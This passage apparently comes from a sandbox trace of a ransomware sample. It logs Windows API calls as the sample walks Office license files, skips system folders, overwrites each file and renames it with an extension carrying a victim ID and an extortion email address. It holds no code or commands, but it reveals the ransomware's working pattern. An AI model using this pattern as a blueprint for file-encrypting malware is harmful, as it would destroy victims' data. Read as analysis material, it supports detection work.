1 [0108.122] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProVL_MAK-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprovl_mak-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProVL_MAK-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprovl_mak-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0108.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0108.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0108.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0108.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0108.123] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe969686e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe969686e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9755493, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1a91, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProVL_MAK-ppd.xrm-ms", cAlternateFileName="PR9C93~1.XRM")) returned 1 [0108.123] lstrcmpiW (lpString1="ProjectProVL_MAK-ppd.xrm-ms", lpString2=".") returned 1 [0108.123] lstrcmpiW (lpString1="ProjectProVL_MAK-ppd.xrm-ms", lpString2="..") returned 1 [0108.123] lstrcmpiW (lpString1="ProjectProVL_MAK-ppd.xrm-ms", lpString2="...") returned 1 [0108.123] lstrcmpiW (lpString1="ProjectProVL_MAK-ppd.xrm-ms", lpString2="windows") returned -1 [0108.123] lstrcmpiW (lpString1="ProjectProVL_MAK-ppd.xrm-ms", lpString2="recovery") returned -1 [0108.123] lstrcmpiW (lpString1="ProjectProVL_MAK-ppd.xrm-ms", lpString2="perflogs") returned 1 [0108.123] lstrcmpiW (lpString1="ProjectProVL_MAK-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0108.123] lstrcmpiW (lpString1="ProjectProVL_MAK-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.123] lstrcmpiW (lpString1="ProjectProVL_MAK-ppd.xrm-ms", lpString2="system volume information") returned -1 [0108.123] lstrcmpiW (lpString1="ProjectProVL_MAK-ppd.xrm-ms", lpString2="msocache") returned 1 [0108.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0108.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProVL_MAK-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0108.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0108.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProVL_MAK-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x241128, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProVL_MAK-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0108.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0108.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0108.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProVL_MAK-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0108.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0108.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProVL_MAK-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x241178, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProVL_MAK-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0108.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0108.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0108.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0108.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0108.124] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProVL_MAK-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprovl_mak-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.124] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=6801) returned 1 [0108.124] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a90) returned 0x205850 [0108.124] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0x1a90, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0x1a90, lpOverlapped=0x0) returned 1 [0108.143] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.143] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1a90, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0x1a90, lpOverlapped=0x0) returned 1 [0108.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0108.143] CloseHandle (hObject=0x45c) returned 1 [0108.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0108.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0108.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0108.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0108.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0108.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0108.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.143] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProVL_MAK-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprovl_mak-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProVL_MAK-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprovl_mak-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0108.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0108.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0108.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0108.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0108.145] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe977b69a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe977b69a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9813ffc, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d51, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProVL_MAK-ul-oob.xrm-ms", cAlternateFileName="PR5858~1.XRM")) returned 1 [0108.145] lstrcmpiW (lpString1="ProjectProVL_MAK-ul-oob.xrm-ms", lpString2=".") returned 1 [0108.145] lstrcmpiW (lpString1="ProjectProVL_MAK-ul-oob.xrm-ms", lpString2="..") returned 1 [0108.145] lstrcmpiW (lpString1="ProjectProVL_MAK-ul-oob.xrm-ms", lpString2="...") returned 1 [0108.145] lstrcmpiW (lpString1="ProjectProVL_MAK-ul-oob.xrm-ms", lpString2="windows") returned -1 [0108.145] lstrcmpiW (lpString1="ProjectProVL_MAK-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0108.145] lstrcmpiW (lpString1="ProjectProVL_MAK-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0108.145] lstrcmpiW (lpString1="ProjectProVL_MAK-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0108.145] lstrcmpiW (lpString1="ProjectProVL_MAK-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.146] lstrcmpiW (lpString1="ProjectProVL_MAK-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0108.146] lstrcmpiW (lpString1="ProjectProVL_MAK-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0108.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0108.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProVL_MAK-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0108.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0108.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProVL_MAK-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241358, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProVL_MAK-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0108.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0108.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0108.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProVL_MAK-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0108.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0108.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProVL_MAK-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x2412e0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProVL_MAK-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0108.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0108.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0108.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0108.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0108.146] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProVL_MAK-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprovl_mak-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.147] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11601) returned 1 [0108.147] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.147] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0108.147] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0108.149] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.149] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0108.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.149] CloseHandle (hObject=0x45c) returned 1 [0108.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0108.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0108.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0108.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0108.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0108.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0108.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0108.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0108.150] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProVL_MAK-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprovl_mak-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProVL_MAK-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprovl_mak-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0108.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0108.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0108.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0108.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0108.151] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9708fd8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9708fd8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe97c7b32, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4dea, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProVL_MAK-ul-phn.xrm-ms", cAlternateFileName="PRD959~1.XRM")) returned 1 [0108.151] lstrcmpiW (lpString1="ProjectProVL_MAK-ul-phn.xrm-ms", lpString2=".") returned 1 [0108.151] lstrcmpiW (lpString1="ProjectProVL_MAK-ul-phn.xrm-ms", lpString2="..") returned 1 [0108.151] lstrcmpiW (lpString1="ProjectProVL_MAK-ul-phn.xrm-ms", lpString2="...") returned 1 [0108.151] lstrcmpiW (lpString1="ProjectProVL_MAK-ul-phn.xrm-ms", lpString2="windows") returned -1 [0108.151] lstrcmpiW (lpString1="ProjectProVL_MAK-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0108.151] lstrcmpiW (lpString1="ProjectProVL_MAK-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0108.151] lstrcmpiW (lpString1="ProjectProVL_MAK-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0108.151] lstrcmpiW (lpString1="ProjectProVL_MAK-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.151] lstrcmpiW (lpString1="ProjectProVL_MAK-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0108.151] lstrcmpiW (lpString1="ProjectProVL_MAK-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0108.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0108.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProVL_MAK-ul-phn.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0108.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0108.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProVL_MAK-ul-phn.xrm-ms", cchWideChar=30, lpMultiByteStr=0x240f20, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProVL_MAK-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0108.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0108.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0108.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProVL_MAK-ul-phn.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0108.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0108.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProVL_MAK-ul-phn.xrm-ms", cchWideChar=30, lpMultiByteStr=0x2412e0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProVL_MAK-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0108.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0108.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0108.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0108.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0108.152] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProVL_MAK-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprovl_mak-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.152] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19946) returned 1 [0108.152] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4de0) returned 0x24c1d0 [0108.153] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4de0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4de0, lpOverlapped=0x0) returned 1 [0108.155] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.155] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4de0, lpOverlapped=0x0) returned 1 [0108.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.155] CloseHandle (hObject=0x45c) returned 1 [0108.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0108.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.156] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.156] RtlAllocateHeap (HeapHandle=0x1e0000, 